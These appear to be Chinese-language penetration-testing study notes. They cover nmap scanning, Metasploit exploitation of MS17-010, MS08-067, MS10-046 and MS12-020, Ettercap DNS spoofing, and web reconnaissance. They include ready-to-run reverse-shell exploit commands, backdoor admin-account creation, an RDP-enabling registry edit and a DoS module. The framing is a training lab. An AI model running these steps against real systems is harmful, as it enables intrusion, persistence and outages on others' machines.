第一份资料

alt text

7、渗透测试工具实操与实战

ipconfig
ifconfig eth0显示主要网卡信息
- 包含IPv4地址、MAC地址、数据包统计等
- 重要参数:
  - UP表示网卡已启用
  - RUNNING表示网络连接正常
  - MTU 1500为标准以太网帧大小
懒人让ai写了个脚本判断ip网段一致性
ping看ttl：
- TTL=64：通常为Linux系统响应
- TTL=128：通常为Windows系统响应

kali msfconsole

模块：
- exploits：攻击模块
- payloads：定义攻击成功后产生的效果（如反弹shell）
- auxiliary：扫描模块，主要用于漏洞检测
- encoders：编码模块，混淆攻击代码特征实现免杀
- post：后渗透模块
- nops：空指令模块
- evasion：逃逸模块（新版新增）
help

nmap

kali的msfconsole里面的nmap

快速扫描：
使用 nmap -F <目标IP>
进行快速端口扫描，快速发现常见端口的开放状态。
深度扫描：
使用 nmap -T4 -A <目标IP>
进行全面扫描，包含操作系统识别、服务版本识别等。
TCP全连接扫描：
使用 nmap -sT <目标IP>
建立完整的三次握手，进行TCP连接扫描。
操作系统探测：
使用 nmap -O <目标IP>
识别目标操作系统类型和版本。
主机存活探测：
使用 nmap -sP <目标IP范围>
进行主机存活探测，确认哪些主机在线。
脚本扫描：
使用 nmap --script=<脚本名> <目标IP>
运行特定的脚本（如漏洞扫描）进行深度检查。
跳过主机存活检测：
使用 nmap -Pn <目标IP>
跳过ICMP探测，直接扫描端口。
扫描多个IP：
使用 nmap <目标IP范围>
可以扫描多个IP地址，查找整个子网的设备。
修改TTL值：
使用 nmap --ttl=<值> <目标IP>
修改TTL值，以伪装目标系统。
服务版本探测：
使用 nmap -sV <目标IP>
获取端口的服务版本信息，帮助识别潜在的漏洞。
使用nmap -sV -p 80,443,445 <目标IP>
获取80、443、445端口的服务版本信息，帮助分析漏洞。
Web应用漏洞扫描：
使用 nmap --script=http-vuln* <目标IP>
使用脚本扫描常见Web漏洞（如永恒之蓝、WebDAV等）。

漏洞攻击

search ms08-067
- 可搜索不同年份漏洞如ms12、ms17
- 老版本系统（如2020版）可能只包含部分辅助模块
通过use exploit/windows/smb/ms08_067_netapi或use 0（匹配搜索结果序号）调用特定漏洞模块
show option/payloads
通过show payloads可查看所有有效载荷，推荐使用windows/meterpreter/reverse_tcp
meterpreter的优势在于整合系统操作命令，提供更全面的控制功能
使用例子：

use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
exploit/run

set设置参数
- RHOSTS：支持单个IP、CIDR范围或文件导入（file:格式）
- LHOST：监听主机IP（建议使用ifconfig确认）
- LPORT：可自定义高端口号（避免使用1024以下端口）
多使用show option去确认
成功标志：出现Meterpreter session opened提示，显示本地监听端口与目标端口的映射关系（如4444→1044）
自动识别机制：系统会检测目标OS版本（如Windows XP SP3 English）并自动选择最适合的攻击方案

具体操作

权限验证命令:
Windows: getuid
Linux: whoami
shell命令进入目标系统命令行
账户创建命令: net user 用户名密码 /add
管理员权限提升: net localgroup administrators 用户名 /add
远程登录配置:
需在目标系统"我的电脑→属性→远程"中启用远程桌面功能
命令行也可配置远程登录：reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f
rdesktop命令测试远程连接

Ms10-046漏洞攻击演示

漏洞编号: MS10-046（2010年披露）
利用对象: Windows快捷方式LNK文件自动执行代码漏洞
文件特征:
- 图标带箭头标记，实际格式为.lnk，本质是文件引用（如指向C盘）
核心缺陷:
- Windows未正确处理LNK文件，特制LNK文件可自动执行指定代码
触发条件:
- 仅需资源管理器查看LNK文件所在位置，无需用户主动点击执行
受影响系统：
- Windows XP SP3/SP2
- Vista SP2/SP1
- Server 2008 R2/SP2
- Windows 7

实战
- search ms08-067
- 加载攻击模块和有效载荷模块
- 关键参数：
  - LHOST：监听地址（必须设置为攻击机IP）
  - LPORT：监听端口（默认4444）
  - SRVHOST：服务主机（必须与LHOST一致）默认0.0.0.0地址需改为攻击机实际IP
  - SRVPORT：服务端口（默认80）

攻击原理：
- 利用快捷方式漏洞（.lnk文件）触发代码执行
- 通过HTTP服务（80端口）分发恶意负载
- 建立反向TCP连接回攻击机

大白话就是，我这里在80端口开了服务，里面有攻击命令，让人家ink点击后访问我的服务端口80就执行了危险命令

配合Ettercap内网欺骗
- 专业内网欺骗工具，支持图形界面（ettercap -G命令）
DNS欺骗配置：
- 修改/etc/ettercap/etter.dns文件
- 添加*.com A 攻击机IP
- 使所有.com域名解析到攻击机
劫持网段
- 执行命令：ettercap -T -q -i eth0 -P dns_spoof
- 参数说明：
  - -T：文本界面模式
  - -q：安静模式（不显示输出）
  - -i：指定网卡
  - -P：使用DNS欺骗插件
  - 欺骗效果：使目标访问任意.com网站时跳转到攻击机

继续实战
标准流程：

use exploit/windows/browser/ms10_046...
set payload windows/shell/reverse_tcp
set LHOST 攻击机IP
set SRVHOST 攻击机IP #这个漏洞是我自己ip

回显技术要点：
- 利用WebDAV协议传递恶意文件
- 使用x86/shikata_ga_nai编码器规避检测
- 最终建立命令shell会话

exit退出session，sessions查看，session 1通过序号重新进入

MS12-020漏洞攻击演示

比较简单就只有ai总结笔记如下

官方描述
漏洞性质: 远程桌面协议(RDP)中的漏洞可能允许远程执行代码(2671387)，微软安全等级评定为"严重"
影响范围: 影响所有支持版本的Windows操作系统，但默认情况下未启用RDP协议的系统不受影响
修复方式: 通过修改远程桌面处理内存中数据包的方式以及RDP服务处理数据包的方式来解决
实验提示
攻击原理: 利用RDP(远程桌面协议)发送特制数据包，RDP是一个多通道(multi-channel)协议
攻击效果: 该漏洞可用于实施DoS(拒绝服务)攻击，使目标系统蓝屏崩溃
模块特点: 使用Metasploit中的auxiliary(辅助)模块而非exploit模块，属于辅助攻击手段
使用辅助模块
模块选择:
auxiliary/dos/windows/rdp/ms12_020_maxchannelids: 实施DoS攻击
auxiliary/scanner/rdp/ms12_020_check: 检查目标是否存在该漏洞
模块特点: 辅助模块不需要设置payload，因为它不直接获取系统权限
参数设置: 只需设置RHOSTS(目标IP)和RPORT(默认3389)
实验演示

攻击现象: 执行攻击后目标Windows系统立即蓝屏，显示"RDPWD.SYS"相关错误
技术细节: 错误代码为STOP:0x00000050，表明发生了内存访问冲突
攻击确认: 模块发送210字节的特制数据包后，检测到RDP服务已停止
5. 辅助模块设置

必需参数:
RHOSTS: 目标主机IP或IP范围(如192.168.10.128)
RPORT: 远程桌面服务端口，默认为3389
可选参数: 可使用CIDR表示法指定整个网段进行批量检测
6. 辅助模块运行

批量检测: 使用ms12_020_check模块可对整个局域网进行漏洞扫描
检测限制: 结果可能存在不确定性，需结合其他方法验证
实战应用: 适合在渗透测试初期快速识别网络中易受攻击的主机
二、内容总结

实验特色: 展示了如何利用不同协议和模块产生不同攻击效果，强调辅助模块的重要性
学习要点:
理解RDP协议多通道特性与漏洞关系
掌握Metasploit中auxiliary模块的使用场景
区分DoS攻击与权限获取攻击的差异
延伸练习: 建议结合MS08-067等漏洞进行综合渗透测试练习

8、信息收集

操作系统识别方法

F12

Network标签页刷新页面获取请求记录，查看响应头中的Server字段
例子：
Windows系统识别
- 识别特征：
  - Server字段包含"Microsoft-IIS"
  - X-Powered-By字段显示"ASP.NET"
- 典型配置：
  - 操作系统：Windows Server
  - 中间件：IIS
Linux系统识别
- 识别特征：
  - Server字段包含"Apache"
  - 无明显的Windows特有标识
- 版本确认：
  - 通过响应头特殊字段查询（如Debian）
  - 使用搜索引擎验证系统特征
- 典型配置：
  - 操作系统：Debian Linux
  - 中间件：Apache

中间件识别技巧

常见类型：
- Apache（跨平台，常见于Linux）
- IIS（Windows专属）
- Nginx（高性能Web服务器）
识别要点：
- 响应头中的Server字段
- X-Powered-By字段补充信息
- 特定URL路径特征

语言

搜索引擎
- 网站地址+技术关键词（如PHP/JSP）进行搜索

源代码收集

收集目的：确定网站使用的CMS或框架类型
主要方法：
- 查看网页源代码中的特征文件路径（如wp-content）
- 使用开发者工具分析网络请求
- 搜索引擎查询特征字符串
  - 特征文件：wp-content和wp-includes目录是WordPress的典型特征
  - 关联信息：WordPress通常使用PHP+MySQL技术栈

数据库信息收集

推断方法：

根据CMS类型推断（WordPress通常使用MySQL）
通过网站错误信息获取
使用专业工具扫描
ping拿到ip地址

C:\Users\luoyinhui>ping baidu.com
正在 Ping baidu.com [111.63.65.103] 具有 32 字节的数据:

nc扫描：nc -n -v -w1 -z [IP] [端口列表]

常见端口

web类(web漏洞/敏感目录)
80 web
80-89 web
8000-9090 web
数据库类
1433 MSSQL
1521 Oracle
3306 MySQL
5432 PostgreSQL
特殊服务类
443 SSL心脏滴血
873 Rsync未授权
5984 CouchDB http://xxx:5984/_utils/
6379 redis未授权
7001,7002 WebLogic默认弱口令，反序列
9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞
11211 memcache未提权访问
27017,27018 MongoDB未授权访问
50000 SAP命令行执行
50070,50030 hadoop认证端口未授权访问
常用端口类
21 ftp
22 SSH
23 Telnet
2601,2604 zebra路由，默认密码zebra
3389 远程桌面

域名

在线工具：

站长之家子域名查询工具(tool.chinaz.com/subdomain)
IP138子域名查询(site.ip138.com)
查子域(chaziyu.com)
子域名爆破工具subDomainsBrute
例子：
- 创建20个线程访问百度，将结果保存到baidu.txt
- python subDomainsBrute.py -t 20 http://baidu.com -o baidu.txt